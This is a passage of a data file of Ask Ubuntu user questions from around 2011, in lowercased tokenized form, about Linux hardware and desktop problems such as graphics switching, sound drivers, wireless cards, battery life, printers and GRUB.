87489	vgaswitcheroo not selecting discrete card	i have a dell 5110 laptop that has hybrid graphics . i have tried using vgaswitcheroo to some limited success , but i have still not been able to select my discrete ati 6470 card . i use the following commands with the following outputs : root @ mikelaptop : ~ # cat /sys/kernel/debug/vgaswitcheroo/switch 0 : dis : : off:0000:01:00.0 1 : igd : + : pwr:0000:00:02.0 root @ mikelaptop : ~ # echo on > /sys/kernel/debug/vgaswitcheroo/switch root @ mikelaptop : ~ # cat /sys/kernel/debug/vgaswitcheroo/switch 0 : dis : : pwr:0000:01:00.0 1 : igd : + : pwr:0000:00:02.0 root @ mikelaptop : ~ # echo dis > /sys/kernel/debug/vgaswitcheroo/switch root @ mikelaptop : ~ # cat /sys/kernel/debug/vgaswitcheroo/switch 0 : dis : : pwr:0000:01:00.0 1 : igd : + : pwr:0000:00:02.0 root @ mikelaptop : ~ # echo igd > /sys/kernel/debug/vgaswitcheroo/switch root @ mikelaptop : ~ # cat /sys/kernel/debug/vgaswitcheroo/switch 0 : dis : : pwr:0000:01:00.0 1 : igd : + : pwr:0000:00:02.0 root @ mikelaptop : ~ # echo off > /sys/kernel/debug/vgaswitcheroo/switch root @ mikelaptop : ~ # cat /sys/kernel/debug/vgaswitcheroo/switch 0 : dis : : off:0000:01:00.0 1 : igd : + : pwr:0000:00:02.0 as you can see here , vgaswitcheroo turns power on and off to my discrete card , but for some reason will not select my discrete card . when i tried using echo ddis > /sys/kernel/debug/vgaswitcheroo/switch , then logged out , my system froze . can anyone help me ? thanks !
87490	nvidia gt 540m on asus working on ubuntu 11.10 optimus 100 %	this is a laptop asus k53sv-sx538v with nvidia geforce gt 540m . i have several questions about this topic : 1 . do i need to install additional drivers other than the one ubuntu recommends during installation ? 2 . if so , after installing bumblebee or ironhide in ubuntu , how i can set any program to always start with nvidia and intel ? 3 . as seen in some forums , how can i disable the nvidia card ? 4 . how do people run ubuntu if it 's always throttled to 100 % ? i can not run 1080p movies automatically or run games , etc . regards , thanks .
87493	how do i get sound to work with ati technologies inc rv710/730 soundcard ?	im new to linux , and just installed ubuntu 11.10 . i ca n't get my sound to work , with either my internal sound card or the external ati technologies inc rv710/730 soundcard . and i have downloaded the latest alsa version . i got no clue about what 's wrong so i 'd be greatful for answers . : )
87494	how to prevent installation from ejecting cd-rom ?	i 'm installing ubuntu server 10.04 over kvm switch . i have no physical access to the server . the server has ubuntu installation cd inserted . how to prevent setup from ejecting it after completion ?
87497	native client chrome games	so i 've been trying to run some chrome applications that make use of google 's new technology of native client on my new desktop computer . they all give me errors when attempting to start the game . one of them does sometimes work but when it does , refreshing or closing the tab then opening the game again will result with it not working again . i have no graphics card only the on-board graphics built in the i5 cpu . my computer is a lenovo h330 and i 'm running ubuntu 11.10 . here 's a montage of the chrome applications and their corresponding errors . image link note that the 'bastion ' game has seemingly every day given me a different error . there has been a total of four different errors it has given me . one that i did n't get was the first . then the second different error is the one in the picture . the third is the error below and finally today it has given me a fourth error which is located below where the third error is . the bastion game seems to give more informative errors then the others . oh no ! bastion has stopped working this game requires a webgl-compatible graphics card and that webgl is enabled . please check to make sure you have a compatible card with the latest drivers from your card manufacturer . for a list of chrome webgl compatible cards , check out chrome support . some versions of chrome can disable webgl , please check chrome : //flags to ensure it is enabled . oh no ! bastion has stopped working the game encountered an error and was forced to quit . we 're sorry for the inconvenience . your graphics card does not meet the minimum requirement to run the game . bastion requires a graphics card with at least 512mb of vram . why ca n't i run these nacl compiled games ? here 's the content of the /var/log/xorg.0.log http : //pastebin.com/9qwnpcx7 all the games work fine on windows 7 .
87499	why my usb modem wo n't displayed as /dev/ttyusb0 ?	hello dearest community , i am learning to use ubuntu server , so all my setting will be done in command line . if i use ubuntu desktop , well , my modem will be automatically detected , and i am up and running in a second . but because i use ubuntu server , i must done everything manually . i already know that i must use wvdial to initiate the modem connection process . but , the problem is , my evdo modem ( huawei ec-1260 2 ) is not detected as /dev/ttyusb0 . so the wdial wo n't run . is there any solution for this ? thanks
87503	short battery life for dell xps 15z	i bought dell xps 15z and installed ubuntu 11.10 on this laptop . laptop and ubuntu liked me . but i have problem with battery life . in windows it can 4-5 hours , but in ubuntu it is not more 2 hours . can i do something 8gb ram , intel i7 , nvidia gt525 2gb , ... thanks for helps linked question : battery drain on ubuntu is fast
87509	when ubuntu asks for an admin user 's password , how does it decide which administrative user to ask for ?	i am setting up an ubuntu ( 10.10 ) machine that will be used by several people . it is a shared machine in a small office . its primary roles are hosting virtual machines with virtualbox and serving files with samba . for samba , several user accounts need to be set up so that various people can connect to the samba shares from their own workstations . however , there is also an account that is dedicated to just running virtual machines , that multiple people will be using . sometimes people try to do things with this account that require elevated privileges - this causes gnome 's `` please enter an administrative user 's password '' dialog to pop up . however , this dialog requests my password - when i set up the machine , mine was the first account created , so it seems to be assuming that i am the only user granted sudo powers . i want to designate another user as the `` administrator of first resort , '' so to speak , and it ca n't be the shared-account user , because everyone has to know the password of that account , so i want its privileges strictly limited . it ca n't be my account , since no effing way am i telling other people my password , and i wo n't be present at the site often enough to enter it myself . there is , though , someone who can do this in person , so i added them to /etc/sudoers . how can i tell ubuntu that when it needs to elevate privileges for something , it should ask for their account first ? to summarize : accounts on the machine : alice , bob , carol , dave , eliza . when ubuntu was installed , alice was the first user , added during the install process . `` dave '' is actually an account that many people use , who ca n't be in /etc/sudoers because its password is public knowledge . bob has been set to be an `` administrative '' account in gnome and is appropriately entered in /etc/sudoers - bob is the boss at this office . when actions that need elevated privileges are attempted while logged in as bob , carol , eliza , or dave , the system should request bob 's credentials . when actions that need elevated privileges are attempted while logged in as alice , the system should request alice 's credentials ( although alice is sort of a buckaroo sysadmin and has a habit of using su - to do extended admin tasks ) . what config changes do i need to make to bring about the desired state here ?
87515	dummy output using 82801ji ( ich10 family ) hd audio controller	my computer at work which runs 11.10 exclusively , has been very very quiet for a few weeks now . i am not sure when exactly the sound stop working but it was after the upgrade to oneiric since i remember listening to music just before the upgrade . i tried many suggested solutions out there but it still does not want to work . its not a case of sound being mute or lowered . when i play music i can see activity in the pulse audio volume control ( under the playback tab there is a progress bar that shows activity ) . but there is no sound coming out of either front or rear 3.5mm jacks or the hdmi ( through monitor ) . i have unity , gnome3 and xfce installed side by side and neither of them make a squawk ! anyways , i really like to know how to debug and fix this issue . i am comfortable using the terminal , and if you guide me i can provide debug info . what can i do to find out what the issue is and to fix it ? sound is onboard : 00:1b.0 audio device : intel corporation 82801ji ( ich10 family ) hd audio controller 03:00.1 audio device : nvidia corporation high definition audio controller ( rev a1 ) update 1 : as pointed out by fossfreedom in the comment , the issue seems to be in the device for sound output . somehow my real devices have been replaced with a `` dummy device '' . how can i add my on-board sound device to this list ? update 2 : i tried running sudo alsa force-reload as suggested and here is the error i get : sudo alsa force-reload unloading alsa sound driver modules : snd-intel8x0 snd-ac97-codec snd-hdacodec-hdmi snd-hda-codec-realtek snd-hda-intel snd-hda-codec snd-hwdep snd-pcm snd-seq-midi snd-rawmidi snd-seq-midi-event snd-seq snd-timer snd-seq-device snd-page-alloc ( failed : modules still loaded : snd-hda-codec-hdmi snd-hda-codec-realtek snd-hda-intel snd-hda-codec snd-hwdep snd-pcm snd-timer snd-page-alloc ) . loading alsa sound driver modules : snd-intel8x0 snd-ac97-codec snd-hda-codec-hdmi snd-hda-codec-realtek snd-hda-intel snd-hda-codec snd-hwdep snd-pcm snd-seq-midi snd-rawmidi snd-seq-midi-event snd-seq snd-timer snd-seq-device snd-page-alloc . update 3 : here is the detailed list of my sound devices as requested : sudo lshw -class multimedia *-multimedia description : audio device product : high definition audio controller vendor : nvidia corporation physical id : 0.1 bus info : pci @ 0000:03:00.1 version : a1 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=hda intel latency=0 resources : irq:17 memory : fbefc000-fbefffff *-multimedia description : audio device product : 82801ji ( ich10 family ) hd audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=hda intel latency=0 resources : irq:56 memory : f9cf4000-f9cf7fff update 4 : this is getting interesting . i thought i found the solution when i saw that my user did not have permission to use the sound device . so i add myself to the audio and video groups and rebooted . now the sound devices are available under choose a device for sound output . with lots of hope i selected internal audio analog stereo as the device , but still no sound at all is coming out of the system : ( . i tried using the speaker test tool as well as playing music while trying out all the different jacks . i also tried switching between hdmi and the internal audio , still no luck . what else can i do next ?
87519	how to make my dell 1390 wlan minicard work	i have a dell laptop with at dell wireless 1390 wlan mini-card driver , when i installed ubuntu side by side with win7 i assume it was missing a wireless driver since that 's what it said . later on i reinstalled completely to ubuntu , and connected my laptop to a internet cable assuming it will get all the drivers from ubuntu servers/depositories . so the problem now is that in the networking tab i dont even see a wireless connection option , when i go to system settings - > additional drivers , it shows me that im using broadcom sta proprietary wireless driver . but i still do n't see my wireless connection . i have looked for tutorials but they are mostly too old . can someone please provide me with a step by step guide or some guidance on how to fix this issue , or give me a link to a place where it 's shown how to fix it . the information that was required roberts @ roberts-latitude-d630 : ~ $ sudo lshw -class network [ sudo ] password for roberts : *-network unclaimed description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0c:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : fe8fc000-fe8fffff *-network description : ethernet interface product : netxtreme bcm5755m gigabit ethernet pci express vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 02 serial : 00:1c:23:29:51 : ed size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.119 duplex=full firmware=5755m-v3.29 ip=192.168.0.6 latency=0 link=yes multicast=yes port=twisted pair speed=1gbit/s resources : irq:44 memory : fe7f0000-fe7fffff and roberts @ roberts-latitude-d630 : ~ $ rfkill list all 1 : dell-wifi : wireless lan soft blocked : no hard blocked : no 2 : dell-bluetooth : bluetooth soft blocked : no hard blocked : no 3 : hci0 : bluetooth soft blocked : no hard blocked : no roberts @ roberts-latitude-d630 : ~ $
87520	black screen after remove ati drivers , how do i reinstall ?	well the updated ati just came out so i tried to install it . i did the following : sudo apt-get remove -- purge fglrx sudo apt-get remove -- purge xserver-xorg-video-ati xserver-xorg-video-radeon sudo apt-get install xserver-xorg-video-ati sudo apt-get install -- reinstall libgl1-mesa-glx libgl1-mesa-dri xserver-xorg-core sudo dpkg-reconfigure xserver-xorg restart your computer i select ubuntu from grub and that is it , a black screen . i have no idea how to repair this . i guess i got cocky as i followed the same instruction for ati drivers 11.10 and 11.11 without a problem . how do i fix this issue so i can boot into ubuntu and complete the driver installation process ?
87522	no sound after fresh install	lspci shows me this : 80:01.0 audio device : via technologies , inc. vt8237a/vt8251 hda controller ( rev 10 ) i have openchrome installed ( it appears installed in the software center ) but i ca n't hear any sounds . as you can see my sound card is a via 64mb . i know i ca n't expect much , but listening to music should be ok . i installed ubuntu 11.04 , and immediately upgraded to 11.10 . i think that with my video card , i ca n't use unity 3d ( right now i 'm using unity 2d ) , but when i go to system info > graphics section , it shows me : driver : unknown . it seems to me that via graphics drivers are not working nor are sounds via drivers .
87524	why is ubuntu so power-inefficient ?	i 'm currently getting 7â8 hours of battery life whilst using windows , but i only get about 3 hours in ubuntu ? why the big gap ? some theories of mine : specialised/optimised drivers in windows more resource usage in ubuntu lack of effective power-saving feature in ubuntu , vs. windows , which specifically tries to reduce battery usage when on battery power dell has a conspiracy with microsoft . seriously , though . i have a 9-cell battery ; i should be getting much better life , right ? any way to solve this problem ?
87528	where do i suggest features for the ccsm replacement ?	there are a few features available in ccsm ( compiz config settings manager ) that i want to make sure are available even if ccsm becomes completely defunct and replaced in ubuntu . and , i would like to help improve ubuntu going forward . so , i 'd just like to know where is the best place to makes these suggestions and offer insight into my ubuntu desktop usage patterns .
87531	how do i install ubuntu in virtualbox ?	i want to install ubuntu on my hp dv6 3000 within a virtual machine . i did so once with ubuntu 10.10 , but the internet did n't work . a friend recommended i try 9.10 . so i want to give the new release a try , will it work on my computer in a virtual machine ? do i need some kind of special configuration to use it ? thanks for any help in advance .
87535	touchscreen not working on a dell inspiron duo	screen on my dell inspiron duo is not working with ubuntu 11.10 , though it worked when i initially installed it ( ~one week ago ) . another note : the touchscreen works with windows 7 ( dual boot ) .
87537	when i close my laptop lid my external monitor turns off	i saw this thread : prevent external monitors from shutting off when laptop lid is closed ? i entered this code ( from that thread ) : gconftool-2 -- type string -- set /apps/gnome-power-manager/buttons/lid_ac `` nothing '' but my external monitor still turns off when i close the lid.the laptop remains switched on regardless of the position of the lid . how do i get my external monitor to stay on when my laptop lid is closed ?
87540	finding the printer 's ip address	i 've installed a new printer on the server and on cups , i checked the 'share printers connected to this system ' , but not 'allow printing from the internet ' . the client finds the printer and configures it with a dnssd : //printer-location._ipp._tcp.local/cups but the printer is idle - `` the printer is not responding . '' i 've read that to install the ( any ) printer correctly the ip address is needed . anybody has any idea how to obtain the ip address of a printer ? my printer is not listed in hplip ( yet ) . edit for ipp to work , do i have to set 'allow printing from the internet ' on the server ? also , is it possible to allow only a specific client per ip or mac ? solved so easy . i forgot to check the 'show printers shared by other systems ' on the client machine . i choose the printer i was looking for and bingo ! no need for the ip after all .
87545	what are the differences between the alestic and uec ami images ?	i am going to be bringing up a lot of aws ec2 instances , and can not find out what the differences are between the images provided by ubuntu uec at : http : //uec-images.ubuntu.com/releases/ and the images provided by alestic : http : //alestic.com/ does anyone know what changes alestic do to a base ubuntu image and/or what advantages there are to running an alestic image on amazon vs the uec one ?
87550	openshot creates 0 byte dvd files	i 've created an osp file with openshot , and i wanted to export it as a dvd file . as this is my very first project , i 've checked some how-to-websites and blogs where it was clearly explained how i could export my project . i exactly followed the commands i found there and openshot said my osp file was exported successfully . nevertheless , every time i tried to open the exported dvd file , it said it was n't found . i checked the file 's properties and it actually showed 0 bytes . what did i do wrong ?
87555	how to create or simulate a unified inbox in evolution 3.2 ?	i 've been using thunderbird lately and i like the unified inbox feature , where it aggregates messages in inboxes of your e-mail accounts in one place . this is also present in , for example , ios 5 . but i prefer to use evolution , and from what i 've seen , it does n't have a proper unified inbox but in previous versions it could be simulated with search folders ( see http : //www.svenbit.com/2011/05/create-a-unified-inbox-folder-in-evolution/ ) . in version 3.2 i could not find a way to create these search folders . confusingly , the included help still talks about menu items that do n't exist anymore ( e.g . edit → search folders does n't exist , and message → create rule just sends you to the filter setup dialog ) . and using search → advanced search to search for both read and unread messages works , but only for the account i 'm viewing at the moment , so it 's useless . i could set a filter up to flag all such emails from my inboxes as read and copy them to , say , the inbox in the `` on this computer '' pseudo-account , but it 's obviously not the same , for example if i want to delete a message i just read , or if i was sent a big attachment that would get copied to my computer . is there any other way to achieve what i 'm trying to do ?
87563	remove ubuntu 11.04 partitions	i used to have ubuntu 11.04 . when 11.10 came out , i 've made a fresh install , so i ended up with 2 ubuntu 's and one win7 ( on 2 disks ) ; i have n't realized that i could have pointed my 11.10 to the same swap the 11.04 was using , but that is besides the point , so i 've ended up with 2 swap partitions each of 4gb and 2 file systems for ubuntu ( 30gb and 40gb ) . obviously i want to remove 11.04 first because it eats up space , and second because it 's obsolete for me now . i just want to make sure i am following the right steps here . 1 ) remove ubuntu 11.04 from my grub loader ( burg in my case ) ; done . 2 ) identify the 2 partitions ( swap and filesystem ) for 11.04 that need to be deleted : i have identified them in disk utility ( both are on the same disk ) as follows . being on /dev/sdb they have the lowest number sdb1 and sdb2 . since i also have sdb4 and sdb5 ( swap and filesystem ) i assume they are for my newest ubuntu 11.10 . also , another hint to it beeing the 11.04 is the fact that it 's not mounted . so , my questions are : a ) is it safe to delete the 2 partitions ? have i identified them correctly ? b ) will my current numbering of sdb remain the same ? meaning that a new partition will allocate the number sdb1 again ? or is the number increasing constantly ? thx .
87568	how to block , deny or redirect an ip address or website domain	this question popped a couple of days ago and it is : how to block , deny or redirect an ip address or domain name to another ip or web domain without the use of a router or configuring a browser . basically using only ubuntu to do this . for example , a user uses a computer , he/she does not have access to facebook or twitter ( could be a denied access forever or just between 2pm to 8pm ) . if the user tries to enter facebook or twitter it will be redirected to another place or just plained canceled . the program would be preferable in gui but if there is n't terminal will do . i have checked out for example ufw and gufw but it only works for programs and ports . the case about domain names is not there . which would make it easier to select or deselect a domain .
87571	is grub installed when ubuntu is the only os installed ?	i have a simple question concerning grub . when ubuntu it 's the only system installed on a machine , grub does n't appear when the computer it 's turned on , my question is : when ubuntu is the only system , grub it 's not installed on mbr ? i has this doubt when i tried the aspm command in grub , to see if it could save some battery on my notebook , and the difference was only 0.4w . i do n't even know if it made some effect or it 's just a normal oscilation . thanks .
87574	how can install aurora ( firefox ) and keep updating it ?	i would like test the aurora channel on ubuntu 11.10 . how can i do this ?
87576	slow shutdown due to modemmanager and .. nm-dispatcher.action ?	my ubuntu is slow to shutdown , and the culprits seem to be modemmanager and something called nm-dispatcher.action . on shutdown i get a message on the terminal saying something like `` asking all remaining processes to terminate '' and then there is a ~5 second delay , before unresponsive processes are forcibly killed . one of them was modem-manager , and i do n't have a modem so i fixed that one with simply sudo apt-get remove modemmanager and there does n't appear to be any side effects . the other one is something like `` nm-dispatcher.action : caught signal 15 , shutting down . ... '' which i was able to fix by removing network-manager and network-manager-gnome . but then , obviously , i do n't get the network manager icons and stuff which i need in gnome-shell . i have tried wicd as a replacement , but it is not working to my liking . so how can i prevent those processes from hanging during shutdown ?
87581	pacmd `` failed to set sink port '' when trying to change which output on my sound card to use	linux linux 3.0.0-14-generic # 23-ubuntu smp mon nov 21 20:28:43 utc 2011 x86_64 x86_64 x86_64 gnu/linux oneiric ocelot i have an asus xonar dg sound card which has several outputs to choose from . sometimes i want to use the regular speaker output and have it go through my speakers but other times i 'd like to be able to use the front panel audio port for my headphones . i tried switching the output port in both pavucontrol and the built in ubuntu sound panel , but as soon as an audio stream begins playing the port will change from `` headphones '' back to `` speaker '' and the audio continues coming out of my speakers . so i dropped down to pacmd and tried to change it ... > > > list-sinks 3 sink ( s ) available . index : 0 name : < alsa_output.pci-0000_03_00.1.hdmi-stereo > driver : < module-alsa-card.c > flags : hardware decibel_volume latency dynamic_latency state : suspended suspend cause : idle priority : 9050 volume : 0 : 100 % 1 : 100 % 0 : -0.00 db 1 : -0.00 db balance 0.00 base volume : 100 % 0.00 db volume steps : 65537 muted : no current latency : 0.00 ms max request : 0 kib max rewind : 0 kib monitor source : 0 sample spec : s16le 2ch 44100hz channel map : front-left , front-right stereo used by : 0 linked by : 0 configured latency : 0.00 ms ; range is 0.50 .. 1999.82 ms card : 0 < alsa_card.pci-0000_03_00.1 > module : 4 properties : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` hdmi 0 '' alsa.id = `` hdmi 0 '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 3 '' alsa.card = `` 2 '' alsa.card_name = `` hd-audio generic '' alsa.long_card_name = `` hd-audio generic at 0xfbbfc000 irq 78 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:03:00.1 '' sysfs.path = `` /devices/pci0000:00/0000:00:03.0/0000:03:00.1/sound/card2 '' device.bus = `` pci '' device.vendor.id = `` 1002 '' device.vendor.name = `` ati technologies inc '' device.product.id = `` aa50 '' device.product.name = `` cypress hdmi audio [ radeon hd 5800 series ] '' device.string = `` hdmi:2 '' device.buffering.buffer_size = `` 352768 '' device.buffering.fragment_size = `` 176384 '' device.access_mode = `` mmap+timer '' device.profile.name = `` hdmi-stereo '' device.profile.description = `` digital stereo ( hdmi ) '' device.description = `` cypress hdmi audio [ radeon hd 5800 series ] digital stereo ( hdmi ) '' alsa.mixer_name = `` ati r6xx hdmi '' alsa.components = `` hda:1002aa01,00aa0100,00100200 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' ports : hdmi : hdmi ( priority 0 , available : no ) active port : < hdmi > index : 1 name : < alsa_output.pci-0000_00_1b.0.analog-stereo > driver : < module-alsa-card.c > flags : hardware hw_mute_ctrl hw_volume_ctrl decibel_volume latency dynamic_latency state : suspended suspend cause : idle priority : 9959 volume : 0 : 101 % 1 : 101 % 0 : 0.25 db 1 : 0.25 db balance 0.00 base volume : 100 % 0.00 db volume steps : 65537 muted : no current latency : 0.00 ms max request : 0 kib max rewind : 0 kib monitor source : 1 sample spec : s16le 2ch 44100hz channel map : front-left , front-right stereo used by : 0 linked by : 0 configured latency : 0.00 ms ; range is 0.50 .. 1999.82 ms card : 1 < alsa_card.pci-0000_00_1b.0 > module : 5 properties : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` alc889 analog '' alsa.id = `` alc889 analog '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 0 '' alsa.card = `` 1 '' alsa.card_name = `` hda intel '' alsa.long_card_name = `` hda intel at 0xfb8f8000 irq 77 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:1b.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1b.0/sound/card1 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.id = `` 3a3e '' device.product.name = `` 82801ji ( ich10 family ) hd audio controller '' device.form_factor = `` internal '' device.string = `` front:1 '' device.buffering.buffer_size = `` 352768 '' device.buffering.fragment_size = `` 176384 '' device.access_mode = `` mmap+timer '' device.profile.name = `` analog-stereo '' device.profile.description = `` analog stereo '' device.description = `` internal audio analog stereo '' alsa.mixer_name = `` realtek alc889 '' alsa.components = `` hda:10ec0889,104383c0,00100004 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' ports : analog-output : analog output ( priority 9900 , available : unknown ) analog-output-headphones : analog headphones ( priority 9000 , available : no ) active port : < analog-output-headphones > * index : 2 name : < alsa_output.pci-0000_08_01.0.analog-stereo > driver : < module-alsa-card.c > flags : hardware decibel_volume latency dynamic_latency state : suspended suspend cause : idle priority : 9059 volume : 0 : 100 % 1 : 100 % 0 : 0.00 db 1 : 0.00 db balance 0.00 base volume : 100 % 0.00 db volume steps : 65537 muted : no current latency : 0.00 ms max request : 0 kib max rewind : 0 kib monitor source : 3 sample spec : s16le 2ch 44100hz channel map : front-left , front-right stereo used by : 0 linked by : 0 configured latency : 0.00 ms ; range is 36.00 .. 2000.00 ms card : 2 < alsa_card.pci-0000_08_01.0 > module : 6 properties : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` multichannel '' alsa.id = `` multichannel '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 0 '' alsa.card = `` 0 '' alsa.card_name = `` xonar dg '' alsa.long_card_name = `` c-media oxygen hd audio at 0xe800 , irq 17 '' alsa.driver_name = `` snd_oxygen '' device.bus_path = `` pci-0000:08:01.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1e.0/0000:08:01.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 13f6 '' device.vendor.name = `` c-media electronics inc '' device.product.id = `` 8788 '' device.product.name = `` cmi8788 [ oxygen hd audio ] '' device.string = `` front:0 '' device.buffering.buffer_size = `` 352800 '' device.buffering.fragment_size = `` 352800 '' device.access_mode = `` mmap+timer '' device.profile.name = `` analog-stereo '' device.profile.description = `` analog stereo '' device.description = `` cmi8788 [ oxygen hd audio ] analog stereo '' alsa.mixer_name = `` cmi8786 '' alsa.components = `` cs4245 cmi8786 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' ports : analog-output ; output-speaker : analog output / speaker ( priority 9910 , available : unknown ) analog-output ; output-headphones-1 : analog output / headphones 1 ( priority 9909 , available : unknown ) analog-output ; output-headphones-2 : analog output / headphones 2 ( priority 9908 , available : unknown ) active port : < analog-output ; output-speaker > > > > set-sink-port 2 analog-output ; output-headphones-1 failed to set sink port to 'analog-output ; output-headphones-1 ' . booo . any thoughts ? nothing appears in /var/log/dmesg or /var/log/syslog , i 'm not sure where else i should be looking ...
87587	does microsoft office 2010 still have incompatibility issues with libreoffice	i know microsoft office 2003 and microsoft office 2007 have some incompatibility issues with libreoffice . for example if i create a document in libreoffice with doc format and try to open it in office 2003/2007 , the margin , tables and images might/will move a bit around . reading that microsoft office 2010 is `` more compatible '' are this issues resolved that when i create a doc or odt file , it will be correctly read in office 2010 . note that i say they have incompatibility issues . for what i have seen , the correct format is the one used in libreoffice/openoffice and not the other way around . it is more standardized . update - would like to add that in 2 pages of wikipedia , microsoft office 2010 is mentioned as having compatibility for version 1.1 of the odf . http : //en.wikipedia.org/wiki/opendocument http : //en.wikipedia.org/wiki/microsoft_office_2010 because of this , i made the question just to be sure from experience of other libreoffice users in ubuntu . update 2 - the european it authorities have come up with several ideas to improve the ooxml compatibility in libreoffice . they include all the problems i mentioned like images , macros , frames and such . more info here and here . i want to also add that after libreoffice 4.x , the compatibility level has risen . there is more compatibility between both office suite .
87590	update manager wo n't let me update to ubuntu 11.10	today i was playing with an old netbook ( msi wind u100 ) i have with ubuntu 11.04 ... i 've updated it to the last updates and rebooted ... the problem is , i want to update from ubuntu 11.04 to ubuntu 11.10 but there is simply no option available at all ... and when i try with update-manager -d the messages that appears tells me that the versions that he is about to install is the release candidate version so i cancel it.. how can i solve this problem ?
87592	problem with grub ( blackscreen with flashing white line )	i tried to reboot ubuntu 11.10 . all i get is black screen with flashing white line . i tried to reboot from disk . that just through me back to the boot options screen..i also tried .from disk , from first hard drive please help ! ! !
87593	how to install a brother mfc-5890cn network printer ?	how to install network printer ( brother mfc-5890cn ) in ubuntu 11.10 . anybody can help me to install this printer in ubuntu 11.10 ?
87597	compiz no longer auto starts on login	when i first installed ubuntu 11.10 with gnome-classic , compiz would n't run , and so i solved it by asking here on askubuntu . however , after the most recent set of updates a couple days ago , compiz no longer automatically starts when i boot up and log in . if i simply reload the window manager , then compiz starts . how can i get compiz to start automatically ? update : output of ~/.xsession-errors : ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_widget_get_parent : assertion `gtk_is_widge t ( widget ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_menu_item_get_submenu : assertion `gtk_is_m enu_item ( menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_menu_item_get_submenu : assertion `gtk_is_m enu_item ( menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_menu_item_get_submenu : assertion `gtk_is_m enu_item ( menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_menu_item_get_submenu : assertion `gtk_is_m enu_item ( menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_widget_get_parent : assertion `gtk_is_widge t ( widget ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion 